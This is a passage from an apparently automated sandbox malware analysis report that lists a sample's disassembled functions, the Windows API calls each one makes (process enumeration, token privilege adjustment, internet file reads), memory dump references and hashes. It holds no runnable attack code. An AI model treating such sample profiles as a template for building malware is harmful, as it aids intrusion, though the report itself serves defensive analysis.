                                                          • Instruction Fuzzy Hash: 5441A175A00210AFEB12AF649C87F6E77E9DF44714F048059FA1AAF3D2DA74AD008B91
                                                          Function 003C53DF Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 31dc0d56535b1ac90809ecb964ab390d30e93060070a12b6288ef50765b6d764
                                                          • Instruction ID: 3d7f2da0f90fbd55ec64d4b1055e0ddcd4301e08af93b6686a922411c485b9bc
                                                          • Opcode Fuzzy Hash: 31dc0d56535b1ac90809ecb964ab390d30e93060070a12b6288ef50765b6d764
                                                          • Instruction Fuzzy Hash: 4B118B327009106FE7276F279C44F2ABB9DFF84762B05402DE846DB251CB60BC8287A5
                                                          Function 003AC423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003AC4BE
                                                          • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003AC4D6
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • CoUninitialize.OLE32 ref: 003AC743
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: 7303ab2058574ce18a034a52e5d2914ddf6ee7c7f9dc3be02cc69ce7cdad0793
                                                          • Instruction ID: 6e4ec0ea6e097b3941489e920cdb9b2c5d67d42db49d919f8c8e115a13a580a4
                                                          • Opcode Fuzzy Hash: 7303ab2058574ce18a034a52e5d2914ddf6ee7c7f9dc3be02cc69ce7cdad0793
                                                          • Instruction Fuzzy Hash: B4A12A71108205AFD701EF54C891EABB7ECEF95304F00495DF1969F2A2EB71EA49CB52
                                                          Function 003BC104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00381CB7,?), ref: 003BC112
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003BC124
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: a5a7f3c72d2c429dbc0bbf35c1e2f95e0b399926d3054e98cdffb4d97dc41dad
                                                          • Instruction ID: 59d4de5b780320e41473be91d55840f91e99f2f4811951d09fdd8f39424316cc
                                                          • Opcode Fuzzy Hash: a5a7f3c72d2c429dbc0bbf35c1e2f95e0b399926d3054e98cdffb4d97dc41dad
                                                          • Instruction Fuzzy Hash: 6CE08C78610323CFC7325B29C818F82B6E8EF08348B45843AE98AE2650E778E840C710
                                                          Function 003BEF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 003BEF51
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 003BEF5F
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 003BF01F
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003BF02E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 541ebceb0d6b7d714700026738d07591270e3c809c527bad3bfcd57439fe045a
                                                          • Instruction ID: b72b1eb29c52781d489c078ec5c48b30a6f49cc6e80d1969551aa6cfe1a15cfb
                                                          • Opcode Fuzzy Hash: 541ebceb0d6b7d714700026738d07591270e3c809c527bad3bfcd57439fe045a
                                                          • Instruction Fuzzy Hash: E7516E71508300AFD312EF24DC85EABB7E8FF94714F14482DF5959B262EB70A908CB92
                                                          Function 0039E928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0039E93A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: c15c3961852419f52cd9d301758185f082c7772e390190e6c6aa33342e81dfb0
                                                          • Instruction ID: a637863e6b15d82de088c0e51d3088790934d96fceb2776953c0a276fc4251a9
                                                          • Opcode Fuzzy Hash: c15c3961852419f52cd9d301758185f082c7772e390190e6c6aa33342e81dfb0
                                                          • Instruction Fuzzy Hash: 9E322575A00605DFCB29DF29C48196AB7F1FF48320B16C56EE89ADB7A1E770E941CB40
                                                          Function 003B2404 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003B1920,00000000), ref: 003B24F7
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003B252E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 5c6f1cd9a33c89133ccfa932b87f8eb19bd27093ce9ddde370fd6945efaf5439
                                                          • Instruction ID: 3947eac54c4c394e367efe0eeebdbd6875890c1cc7a1e6edfddd7bb95ba0070c
                                                          • Opcode Fuzzy Hash: 5c6f1cd9a33c89133ccfa932b87f8eb19bd27093ce9ddde370fd6945efaf5439
                                                          • Instruction Fuzzy Hash: 1F41C771A04209BFEB22DE95DC85EFBB7BCEB41728F10816BF701A6D40DB719E419650
                                                          Function 003AB3BF Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AB3CF
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003AB429
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003AB476
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 5e85b1c8ea941d72e456b0da59e23881440a22394917d18be9797baee2860056
                                                          • Instruction ID: f6baab5b569195fdaf535963d873a355940a3e6be276146690d3fcacfcb59403
                                                          • Opcode Fuzzy Hash: 5e85b1c8ea941d72e456b0da59e23881440a22394917d18be9797baee2860056
                                                          • Instruction Fuzzy Hash: 09213135A10518DFCB01EFA5D885EAEBBF8FF49310F1480AAE905AF351DB31A915CB51
                                                          Function 00398AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00398AED
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398B1A
                                                          • GetLastError.KERNEL32 ref: 00398B27
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 997ee02db19caac62d053075d97c241ebb911daa5b962857a3bcf012600760cb
                                                          • Instruction ID: d68746f58e2897cf04650bdb9ef829a60a13dc7f94ceca85abae5a46ea4f2906
                                                          • Opcode Fuzzy Hash: 997ee02db19caac62d053075d97c241ebb911daa5b962857a3bcf012600760cb
                                                          • Instruction Fuzzy Hash: FC11BCB2514208AFD729AF64DC86D2BBBBDFB44710B20816EF4469B241EB30BC00CB60
                                                          Function 003A4A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003A4A31
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003A4A48
                                                          • FreeSid.ADVAPI32(?), ref: 003A4A58
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                                          • Instruction ID: f2257be171490786fc302596b98ce4ec8b095ab4bc8a36eb851243248dc3b167
                                                          • Opcode Fuzzy Hash: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                                          • Instruction Fuzzy Hash: 3FF03775A51208BFDB00DFE09C89EBEBBBDEB08701F0044A9A901E2181E6746A048B54
                                                          Function 003A8932 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __time64.LIBCMT ref: 003A8944
                                                            • Part of subcall function 0036537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003A9017,00000000,?,?,?,?,003A91C8,00000000,?), ref: 00365383
                                                            • Part of subcall function 0036537A: __aulldiv.LIBCMT ref: 003653A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID: 0e@
                                                          • API String ID: 2893107130-3044860656
                                                          • Opcode ID: 81f4e7081525cd778f9870f8ac3b0606d3c7c24f3409ab18e04d9b79373adbbe
                                                          • Instruction ID: f43cd43937af9268202b622208c582af1880e2a21fbd54095504e86e0195018b
                                                          • Opcode Fuzzy Hash: 81f4e7081525cd778f9870f8ac3b0606d3c7c24f3409ab18e04d9b79373adbbe
                                                          • Instruction Fuzzy Hash: 3E21A232625610CBC72ACF29D841A52B3E1EBA5310B298E6CD1E6DF2D0CA74A905CB54
                                                          Function 0034E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03465d01526455443ed2c05660ea74499b8617b3e489c997a196dc7e39d22a88
                                                          • Instruction ID: 659856415f5e2f229aa13bc767b876f11dfaa48a0ff6e89e4128113070b93f3f
                                                          • Opcode Fuzzy Hash: 03465d01526455443ed2c05660ea74499b8617b3e489c997a196dc7e39d22a88
                                                          • Instruction Fuzzy Hash: CB229C74A00216CFDB26EF68C481AAEB7F4FF08310F158569E856AF351E374AD85CB91
                                                          Function 003AC75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003AC787
                                                          • FindClose.KERNEL32(00000000), ref: 003AC7B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 78ac35fcf0bee188176dd4273c71493816d4999ae2e306effcbf39fec789e9f3
                                                          • Instruction ID: 2755ba030dddafd336afd2c885d09ce377eb8d4a957c84a89175cfb05e09d134
                                                          • Opcode Fuzzy Hash: 78ac35fcf0bee188176dd4273c71493816d4999ae2e306effcbf39fec789e9f3
                                                          • Instruction Fuzzy Hash: E1113C766106009FD711EF29D845A2AB7E9EF85324F00851EF9AADB391DB30A800CB91
                                                          Function 003AA0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003B957D,?,003CFB84,?), ref: 003AA121
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003B957D,?,003CFB84,?), ref: 003AA133
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 49d5694326d44d5976bda89e19d1ceaee78ba078f3c813b89da4285b4ea21b29
                                                          • Instruction ID: 23857944f1f3bcda8035a3183bcd1140b6c37fdd9bb4c401db67e97aa874e2f1
                                                          • Opcode Fuzzy Hash: 49d5694326d44d5976bda89e19d1ceaee78ba078f3c813b89da4285b4ea21b29
                                                          • Instruction Fuzzy Hash: 33F0A73650522DBBDB229FA4CC48FEA77ADFF09361F008166F909D7181D730A944CBA1
                                                          Function 003984F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00398631), ref: 00398508
                                                          • CloseHandle.KERNEL32(?,?,00398631), ref: 0039851A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 48d24f682b7f8a80025616b51800e70f2d25b5a9034813f14dce7f8e9c395702
                                                          • Instruction ID: 603c2bfb2625be8094e1edf175fd544948a4291e0dcdb867f0c68ac21046c190
                                                          • Opcode Fuzzy Hash: 48d24f682b7f8a80025616b51800e70f2d25b5a9034813f14dce7f8e9c395702
                                                          • Instruction Fuzzy Hash: 93E0B672014610EEEB272B64EC09D777BAEEB44710B158829B496C4474DB62ACA1DB50
                                                          Function 0036A2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00368ED7,?,?,?,00000001), ref: 0036A2DA
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0036A2E3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 80066a17d61224719bcfd67e7de031ed731fc0b2a70e43f52ccc3a4479637432
                                                          • Instruction ID: 9662621202b121151370905b5c84057a9e8589d17773eeed5b99fff3742932b4
                                                          • Opcode Fuzzy Hash: 80066a17d61224719bcfd67e7de031ed731fc0b2a70e43f52ccc3a4479637432
                                                          • Instruction Fuzzy Hash: 47B09235054248BFCA022B91EC09F883F6EEB84BA2F404020FA0DC4060CB6266508B91
                                                          Function 0036F359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a81d0d585199ab859bd360904c7c3add7fa6e340ca80e9e1806c6e1aba9732d
                                                          • Instruction ID: da24a201948c2ef06c89f074ef7b60fdb122b1da99c5a693c0193167984affb6
                                                          • Opcode Fuzzy Hash: 7a81d0d585199ab859bd360904c7c3add7fa6e340ca80e9e1806c6e1aba9732d
                                                          • Instruction Fuzzy Hash: 66320626D2AF414DD7239634E832336A34DAFB73D4F55D737E819B59AAEB29C4834100
                                                          Function 003725AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a6c46a8d3d2d29eef4a73a0f2e8b1af26d2654e412811a61722057259f76e6b
                                                          • Instruction ID: 20e3bcf4bb76d0538089caa539b94f8ff8847fb17374f4b3783db060b3b580ab
